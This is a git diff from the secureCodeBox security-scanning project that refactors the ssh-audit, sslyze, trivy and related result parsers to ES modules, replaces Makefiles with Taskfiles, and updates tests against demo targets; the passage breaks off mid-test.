@@ -175,7 +175,7 @@ const templates = { function transformRecommendationToFinding( recommendationSeverityLevel, value, - destination + destination, ) { // SSH audit has critical and warnings as recommendations. // These are HIGH and MEDIUM severities, respectively @@ -189,7 +189,7 @@ function transformRecommendationToFinding( //algorithmType = kex/ key/ mac, , algorithmNames = {name+note} Object.entries(algorithms).map(([algorithmType, algorithmData]) => { const algorithmNames = Object.entries(algorithmData).map( - ([keyNames, content]) => Object.values(content) + ([keyNames, content]) => Object.values(content), ); const findingTemplate = @@ -204,7 +204,7 @@ function transformRecommendationToFinding( findingTemplate["attributes"] = {}; findingTemplate["attributes"]["algorithms"] = algorithmNames.flatMap( ([algName, note]) => - note == "" ? algName : `${algName} (Note: ${note})` + note == "" ? algName : `${algName} (Note: ${note})`, ); policyViolationFindings.push(findingTemplate); @@ -215,7 +215,6 @@ function transformRecommendationToFinding( return policyViolationFindings; } - function isIPaddress(target) { if (/^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$/.test(target)) return true; @@ -226,11 +225,17 @@ function isIPaddress(target) { * * Parses the raw results from the ssh-audit scanner into Findings */ -async function parse(fileContent) { - const host = fileContent; - if (typeof host === "string") return []; +export async function parse(fileContent) { + if (!fileContent) { + return []; + } + + const report = JSON.parse(fileContent); + if (!report || !report.target) { + return []; + } - const destination = host.target.split(":"); + const destination = report.target.split(":"); const location = "ssh://" + destination[0]; let ipAddress = null; let hostname = null; @@ -238,14 +243,14 @@ async function parse(fileContent) { ? (ipAddress = destination[0]) : (hostname = destination[0]); - const recommendationsArray = Object.entries(host.recommendations); + const recommendationsArray = Object.entries(report.recommendations); const policyViolationFindings = recommendationsArray.flatMap( ([recommendationSeverityLevel, value]) => transformRecommendationToFinding( recommendationSeverityLevel, value, - location - ) + location, + ), ); // informational findings @@ -261,18 +266,16 @@ async function parse(fileContent) { attributes: { hostname: hostname || null, ip_address: ipAddress || null, - server_banner: host.banner?.raw || null, - ssh_version: host.banner?.protocol || null, - ssh_lib_cpe: host.banner?.software, - key_algorithms: host.key, - encryption_algorithms: host.enc, - mac_algorithms: host.mac, - compression_algorithms: host.compression, - key_exchange_algorithms: host.kex, - fingerprints: host.fingerprints, + server_banner: report.banner?.raw || null, + ssh_version: report.banner?.protocol || null, + ssh_lib_cpe: report.banner?.software, + key_algorithms: report.key, + encryption_algorithms: report.enc, + mac_algorithms: report.mac, + compression_algorithms: report.compression, + key_exchange_algorithms: report.kex, + fingerprints: report.fingerprints, }, }; return [serviceFinding, ...policyViolationFindings]; } - -module.exports.parse = parse; diff --git a/scanners/ssh-audit/parser/parser.test.js b/scanners/ssh-audit/parser/parser.test.js index 3f30c70fec..6bbc414ec2 100644 --- a/scanners/ssh-audit/parser/parser.test.js +++ b/scanners/ssh-audit/parser/parser.test.js @@ -2,22 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const fs = require("fs"); -const util = require("util"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const readFile = util.promisify(fs.readFile); - -const { parse } = require("./parser"); +import { parse } from "./parser"; test("ssh-audit parser parses a result into proper findings for dummy-ssh", async () => { - const hosts = JSON.parse( - await readFile(__dirname + "/__testFiles__/dummy-ssh.json", { - encoding: "utf8", - }) - ); + const hosts = await readFile(__dirname + "/__testFiles__/dummy-ssh.json", { + encoding: "utf8", + }); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -464,7 +457,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -472,11 +465,9 @@ test("should properly parse empty json file", async () => { }); test("ssh-audit parser parses a result into proper findings for an example with given port", async () => { - const hosts = JSON.parse( - await readFile(__dirname + "/__testFiles__/portExample.json", { - encoding: "utf8", - }) - ); + const hosts = await readFile(__dirname + "/__testFiles__/portExample.json", { + encoding: "utf8", + }); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` diff --git a/scanners/ssh-audit/scanner/Dockerfile b/scanners/ssh-audit/scanner/Dockerfile index 3e106874c9..f679a2a561 100644 --- a/scanners/ssh-audit/scanner/Dockerfile +++ b/scanners/ssh-audit/scanner/Dockerfile @@ -3,7 +3,7 @@ # SPDX-License-Identifier: Apache-2.0 # Base Image -ARG scannerVersion +ARG scannerVersion FROM positronsecurity/ssh-audit:${scannerVersion} COPY wrapper.sh /wrapper.sh diff --git a/scanners/sslyze/Makefile b/scanners/sslyze/Makefile deleted file mode 100644 index c78948f1b8..0000000000 --- a/scanners/sslyze/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = sslyze -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-unsafe-https diff --git a/scanners/sslyze/Taskfile.yaml b/scanners/sslyze/Taskfile.yaml new file mode 100644 index 0000000000..6c6db81f31 --- /dev/null +++ b/scanners/sslyze/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: sslyze + +tasks: + predeploy: + deps: + - demo-targets:deploy:unsafe-https + cmds: [] diff --git a/scanners/sslyze/integration-tests/sslyze.test.js b/scanners/sslyze/integration-tests/sslyze.test.js index 8e23ecd937..8014564257 100644 --- a/scanners/sslyze/integration-tests/sslyze.test.js +++ b/scanners/sslyze/integration-tests/sslyze.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "Sslyze scans the self-signed unsafe-https demo-target", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "sslyze-unsafe-https", "sslyze", ["--mozilla_config=intermediate", "unsafe-https.demo-targets.svc"], - 90 + 90, ); expect(count).toBe(4); @@ -31,15 +29,17 @@ test( } `); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("sslyze-invalidArg", "sslyze", ["--invalidArg", "example.com"], 90) - ).rejects.toThrow("HTTP request failed"); + scan("sslyze-invalid-arg", "sslyze", ["--invalidArg", "example.com"], 90), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/sslyze/parser/Dockerfile b/scanners/sslyze/parser/Dockerfile index 6aff6d3bd7..449c709d29 100644 --- a/scanners/sslyze/parser/Dockerfile +++ b/scanners/sslyze/parser/Dockerfile @@ -4,13 +4,7 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --production FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./parser.js ./parser.js diff --git a/scanners/sslyze/parser/package-lock.json b/scanners/sslyze/parser/package-lock.json deleted file mode 100644 index 6b070edcb2..0000000000 --- a/scanners/sslyze/parser/package-lock.json +++ /dev/null @@ -1,29 +0,0 @@ -{ - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "sprintf-js": "^1.1.2" - }, - "devDependencies": {} - }, - "node_modules/sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - } - }, - "dependencies": { - "sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - } - } -} diff --git a/scanners/sslyze/parser/package-lock.json.license b/scanners/sslyze/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/sslyze/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/sslyze/parser/package.json b/scanners/sslyze/parser/package.json deleted file mode 100644 index adf62876f5..0000000000 --- a/scanners/sslyze/parser/package.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "description": "Parses result files for the type: 'sslyze-json'", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "dependencies": { - "sprintf-js": "^1.1.2" - }, - "devDependencies": {} -} diff --git a/scanners/sslyze/parser/package.json.license b/scanners/sslyze/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/sslyze/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/sslyze/parser/parser.js b/scanners/sslyze/parser/parser.js index 0fe6237cf2..94989928ca 100644 --- a/scanners/sslyze/parser/parser.js +++ b/scanners/sslyze/parser/parser.js @@ -2,28 +2,36 @@ // // SPDX-License-Identifier: Apache-2.0 -function parse(fileContent) { +export function parse(fileContent) { + if (!fileContent) { + return []; + } + + const report = JSON.parse(fileContent); + // Only 0 when the target wasn't reachable - if (!fileContent.server_scan_results || fileContent.server_scan_results.length === 0) { + if (!report.server_scan_results || report.server_scan_results.length === 0) { return []; } - const serverScanResult = fileContent.server_scan_results[0]; - - if (serverScanResult.connectivity_status == "ERROR"){ + const serverScanResult = report.server_scan_results[0]; + + if (serverScanResult.connectivity_status == "ERROR") { console.error( - "Cannot parse the result file, as some of the scan parts failed." + "Cannot parse the result file, as some of the scan parts failed.", ); return []; } if (process.env["DEBUG"] === "true") { console.log("Parsing Result File"); - console.log(JSON.stringify(fileContent)); + console.log(fileContent); } - - if (fileContent.date_scans_completed) { - serverScanResult.identified_at = new Date(fileContent.date_scans_completed).toISOString(); + + if (report.date_scans_completed) { + serverScanResult.identified_at = new Date( + report.date_scans_completed, + ).toISOString(); } const partialFindings = [ @@ -54,8 +62,6 @@ function parse(fileContent) { return findings; } -module.exports.parse = parse; - // Returns the Scan Result for the individual TLS Versions as array function getTlsScanResultsAsArray(serverScanResult) { const commandResult = serverScanResult.scan_result; @@ -146,10 +152,14 @@ function generateVulnerableTLSVersionFindings(serverScanResult) { } function analyseCertificateDeployments(serverScanResult) { - if (serverScanResult?.scan_result?.certificate_info?.result?.certificate_deployments) { - const certificateInfos = serverScanResult.scan_result.certificate_info.result.certificate_deployments.map( - analyseCertificateDeployment - ); + if ( + serverScanResult?.scan_result?.certificate_info?.result + ?.certificate_deployments + ) { + const certificateInfos = + serverScanResult.scan_result.certificate_info.result.certificate_deployments.map( + analyseCertificateDeployment, + ); // If at least one cert is totally trusted no finding should be created if (certificateInfos.every((certInfo) => certInfo.trusted)) { return []; @@ -197,16 +207,19 @@ function analyseCertificateDeployments(serverScanResult) { }); } else { // No certificate info found - return [{ - name: "ASN.1 Parsing Error", - category: "Invalid Certificate", - description: "An error occurred while parsing the ASN.1 value in the certificate. This may be due to a corrupted certificate, improper formatting, or incompatibility with the cryptography library.", - identified_at: serverScanResult.identified_at, - severity: "MEDIUM", - mitigation: "Verify the integrity of the certificate, or inspect the certificate for custom or non-standard extensions.", - attributes: {}, - } - ]; + return [ + { + name: "ASN.1 Parsing Error", + category: "Invalid Certificate", + description: + "An error occurred while parsing the ASN.1 value in the certificate. This may be due to a corrupted certificate, improper formatting, or incompatibility with the cryptography library.", + identified_at: serverScanResult.identified_at, + severity: "MEDIUM", + mitigation: + "Verify the integrity of the certificate, or inspect the certificate for custom or non-standard extensions.", + attributes: {}, + }, + ]; } } @@ -225,21 +238,25 @@ function analyseCertificateDeployment(certificateDeployment) { const leafCertificate = certificateDeployment.received_certificate_chain[0]; // Check if the certificate is self-signed by comparing subject and issuer - const isSelfSigned = leafCertificate.subject.rfc4514_string === leafCertificate.issuer.rfc4514_string; + const isSelfSigned = + leafCertificate.subject.rfc4514_string === + leafCertificate.issuer.rfc4514_string; // Determine if the certificate is missing required extension const hasMissingRequiredExtension = errorsAcrossAllTruststores.has( - "validation failed: Other(\"Certificate is missing required extension\")" + 'validation failed: Other("Certificate is missing required extension")', ); return { // To be trusted no openssl errors should have occurred and should match hostname trusted: errorsAcrossAllTruststores.size === 0, matchesHostname: !errorsAcrossAllTruststores.has( - "validation failed: Other(\"leaf certificate has no matching subjectAltName\")" + 'validation failed: Other("leaf certificate has no matching subjectAltName")', ), selfSigned: isSelfSigned, - expired: errorsAcrossAllTruststores.has("validation failed: Other(\"cert is not valid at validation time\")"), + expired: errorsAcrossAllTruststores.has( + 'validation failed: Other("cert is not valid at validation time")', + ), untrustedRoot: hasMissingRequiredExtension && !isSelfSigned, }; } diff --git a/scanners/sslyze/parser/parser.test.js b/scanners/sslyze/parser/parser.test.js index 90a662084e..6acbb812c8 100644 --- a/scanners/sslyze/parser/parser.test.js +++ b/scanners/sslyze/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("parses result file for www.securecodebox.io correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/www.securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/www.securecodebox.io.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -57,10 +56,11 @@ test("parses result file for www.securecodebox.io correctly", async () => { }); test("parses result file for tls-v1-0.badssl.com:1010 correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/tls-v1-0.badssl.com_1010.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/tls-v1-0.badssl.com_1010.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -162,10 +162,11 @@ test("parses result file for tls-v1-0.badssl.com:1010 correctly", async () => { }); test("parses result file for expired.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/expired.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/expired.badssl.com.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -284,10 +285,11 @@ test("parses result file for expired.badssl.com correctly", async () => { }); test("parses result file for wrong.host.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/wrong.host.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/wrong.host.badssl.com.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -405,13 +407,11 @@ test("parses result file for wrong.host.badssl.com correctly", async () => { }); test("parses result file for untrusted-root.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/untrusted-root.badssl.com.json", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/untrusted-root.badssl.com.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); @@ -529,10 +529,11 @@ test("parses result file for untrusted-root.badssl.com correctly", async () => { }); test("parses result file for self-signed.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/self-signed.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/self-signed.badssl.com.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -650,13 +651,11 @@ test("parses result file for self-signed.badssl.com correctly", async () => { }); test("parses result file for target without certificate_deployments correctly", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/no-certificate_deployments.json", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/no-certificate_deployments.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); @@ -723,10 +722,11 @@ test("parses result file for target without certificate_deployments correctly", }); test("parses an empty result file correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/unavailable-host.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/unavailable-host.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); @@ -739,7 +739,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/test-scan/Makefile b/scanners/test-scan/Makefile deleted file mode 100644 index 39e16f24ec..0000000000 --- a/scanners/test-scan/Makefile +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = test-scan -custom_scanner = set - -include ../../scanners.mk - -deploy-with-scanner: - @echo ".: 💾 Deploying '$(name)' '$(scanner-prefix)' HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install test-scan . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-$(name)" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" - -integration-tests: - @echo ".: 🩺 Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - cd $(PROJECT_DIR)/tests/integration/ && npm ci && npm run test:integration -- generic/findings-validation.test.js diff --git a/scanners/test-scan/Taskfile.yaml b/scanners/test-scan/Taskfile.yaml new file mode 100644 index 0000000000..aa578895e3 --- /dev/null +++ b/scanners/test-scan/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: test-scan + +tasks: {} diff --git a/scanners/test-scan/parser/parser.js b/scanners/test-scan/parser/parser.js index 483dc1c012..022813e19a 100644 --- a/scanners/test-scan/parser/parser.js +++ b/scanners/test-scan/parser/parser.js @@ -4,12 +4,11 @@ async function parse() { if (process.env["PRODUCE_INVALID_FINDINGS"] === "true") - return getInvalidFindings() - else - return getValidFindings() + return getInvalidFindings(); + else return getValidFindings(); } -function getInvalidFindings(){ +function getInvalidFindings() { return [ { //missing name and category to be a valid finding @@ -22,46 +21,47 @@ function getInvalidFindings(){ hostname: "hostname", operating_system: "osNmap", }, - } - ] + }, + ]; } -function getValidFindings(){ - return [{ - name: "Test read-write-hook service", - description: `Port is using protocol.`, - category: "Open Port", - location: `tcp://rw-hook-test:80`, - osi_layer: "NETWORK", - severity: "INFORMATIONAL", - attributes: { - port: 80, - state: "Open", - ip_addresses: ["10.0.0.1"], - mac_address: "hostInfo.mac", - protocol: "openPort.protocol", - hostname: "hostInfo.hostname", - method: "openPort.method", - operating_system: "hostInfo.osNmap", - service: "openPort.service", - serviceProduct: "openPort.serviceProduct", - serviceVersion: "openPort.serviceVersion", - scripts: "openPort.scriptOutputs", +function getValidFindings() { + return [ + { + name: "Test read-write-hook service", + description: `Port is using protocol.`, + category: "Open Port", + location: `tcp://rw-hook-test:80`, + osi_layer: "NETWORK", + severity: "INFORMATIONAL", + attributes: { + port: 80, + state: "Open", + ip_addresses: ["10.0.0.1"], + mac_address: "hostInfo.mac", + protocol: "openPort.protocol", + hostname: "hostInfo.hostname", + method: "openPort.method", + operating_system: "hostInfo.osNmap", + service: "openPort.service", + serviceProduct: "openPort.serviceProduct", + serviceVersion: "openPort.serviceVersion", + scripts: "openPort.scriptOutputs", + }, }, - }, - { - name: `Host: hostname`, - category: "Host", - description: "Found a host", - location: "hostname", - severity: "INFORMATIONAL", - osi_layer: "NETWORK", - attributes: { - ip_addresses: ["10.0.0.1"], - hostname: "hostname", - operating_system: "osNmap", + { + name: `Host: hostname`, + category: "Host", + description: "Found a host", + location: "hostname", + severity: "INFORMATIONAL", + osi_layer: "NETWORK", + attributes: { + ip_addresses: ["10.0.0.1"], + hostname: "hostname", + operating_system: "osNmap", + }, }, - }, ]; } diff --git a/scanners/test-scan/scanner/Dockerfile b/scanners/test-scan/scanner/Dockerfile index f88199498e..95da799e08 100644 --- a/scanners/test-scan/scanner/Dockerfile +++ b/scanners/test-scan/scanner/Dockerfile @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -FROM alpine:3.11 +FROM alpine:3.22 RUN addgroup --system --gid 1001 test && adduser test --system --uid 1001 --ingroup test WORKDIR /home/securecodebox/ USER 1001 diff --git a/scanners/trivy-sbom/Makefile b/scanners/trivy-sbom/Makefile deleted file mode 100644 index 1ebc6a0b67..0000000000 --- a/scanners/trivy-sbom/Makefile +++ /dev/null @@ -1,11 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = trivy-sbom - -include ../../scanners.mk diff --git a/scanners/trivy-sbom/Taskfile.yaml b/scanners/trivy-sbom/Taskfile.yaml new file mode 100644 index 0000000000..a63be5bb22 --- /dev/null +++ b/scanners/trivy-sbom/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: trivy-sbom + +tasks: {} diff --git a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js index a8cd3a7deb..5c114a9e47 100644 --- a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js +++ b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "trivy-sbom image scan for juiceshop should create sbom", @@ -12,15 +10,15 @@ test( const { categories, severities, count } = await scan( "trivy-juice-test", "trivy-sbom-image", - ["bkimminich/juice-shop:v15.0.0"], - 90 + ["bkimminich/juice-shop:v18.0.0"], + 90, ); expect(count).toEqual(1); expect(categories["SBOM"]).toEqual(1); expect(severities["informational"]).toEqual(1); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( @@ -28,12 +26,14 @@ test( async () => { await expect( scan( - "trivy-invalidArg", + "trivy-invalid-arg", "trivy-sbom-image", ["--invalidArg", "not/a-valid-image:v0.0.0"], - 90 - ) - ).rejects.toThrow("HTTP request failed"); + 90, + ), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/trivy-sbom/parser/package-lock.json b/scanners/trivy-sbom/parser/package-lock.json deleted file mode 100644 index adef34980c..0000000000 --- a/scanners/trivy-sbom/parser/package-lock.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "license": "Apache-2.0" - } - } -} diff --git a/scanners/trivy-sbom/parser/package-lock.json.license b/scanners/trivy-sbom/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/trivy-sbom/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/trivy-sbom/parser/package.json b/scanners/trivy-sbom/parser/package.json deleted file mode 100644 index bd85701561..0000000000 --- a/scanners/trivy-sbom/parser/package.json +++ /dev/null @@ -1,9 +0,0 @@ -{ - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "description": "Parses result files for the type: 'sbom-cyclonedx'.", - "main": "", - "scripts": {}, - "author": "the secureCodeBox authors", - "license": "Apache-2.0" -} diff --git a/scanners/trivy-sbom/parser/package.json.license b/scanners/trivy-sbom/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/trivy-sbom/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/trivy-sbom/parser/parser.js b/scanners/trivy-sbom/parser/parser.js index 58c535ea55..8056a4d1f7 100644 --- a/scanners/trivy-sbom/parser/parser.js +++ b/scanners/trivy-sbom/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(_fileContent, scan) { +export async function parse(_fileContent, scan) { const imageId = scan.spec.parameters[0]; const downloadLink = scan.status.rawResultDownloadLink; @@ -21,5 +21,3 @@ async function parse(_fileContent, scan) { }, ]; } - -module.exports.parse = parse; diff --git a/scanners/trivy-sbom/parser/parser.test.js b/scanners/trivy-sbom/parser/parser.test.js index 9cde675b46..e5e016c992 100644 --- a/scanners/trivy-sbom/parser/parser.test.js +++ b/scanners/trivy-sbom/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; let scan; @@ -32,9 +30,9 @@ test("should create finding correctly", async () => { bomFormat: "CycloneDX", metadata: { component: { - name: "hello-world:latest" - } - } + name: "hello-world:latest", + }, + }, }; const findings = await parse(JSON.stringify(result), scan); @@ -56,10 +54,11 @@ test("should create finding correctly", async () => { }); test("should properly parse cyclonedx json sbom file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/hello-world-cyclonedx.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/hello-world-cyclonedx.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent, scan); // validate findings diff --git a/scanners/trivy/Makefile b/scanners/trivy/Makefile deleted file mode 100644 index 89985fe040..0000000000 --- a/scanners/trivy/Makefile +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = trivy - -include ../../scanners.mk - -.PHONY: deploy-without-scanner -deploy-without-scanner: - @echo ".: 💾 Deploying '$(name)' $(scanner-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="k8sScanScope=cluster" \ No newline at end of file diff --git a/scanners/trivy/Taskfile.yaml b/scanners/trivy/Taskfile.yaml new file mode 100644 index 0000000000..e59e71ce7a --- /dev/null +++ b/scanners/trivy/Taskfile.yaml @@ -0,0 +1,16 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: trivy + additionalHelmInstallArgsForScanner: | + --set="k8sScanScope=cluster" \ + +tasks: {} diff --git a/scanners/trivy/integration-tests/trivy.test.js b/scanners/trivy/integration-tests/trivy.test.js index 7432f21bb2..8abd4d3f2a 100644 --- a/scanners/trivy/integration-tests/trivy.test.js +++ b/scanners/trivy/integration-tests/trivy.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; -jest.retryTimes(3); - -test.concurrent( +test( "trivy image scan for a vulnerable juiceshop demo target", async () => { const { categories, severities, count } = await scan( "trivy-juice-test", "trivy-image", - ["bkimminich/juice-shop:v10.2.0"], - 90 + ["bkimminich/juice-shop:v18.0.0"], + 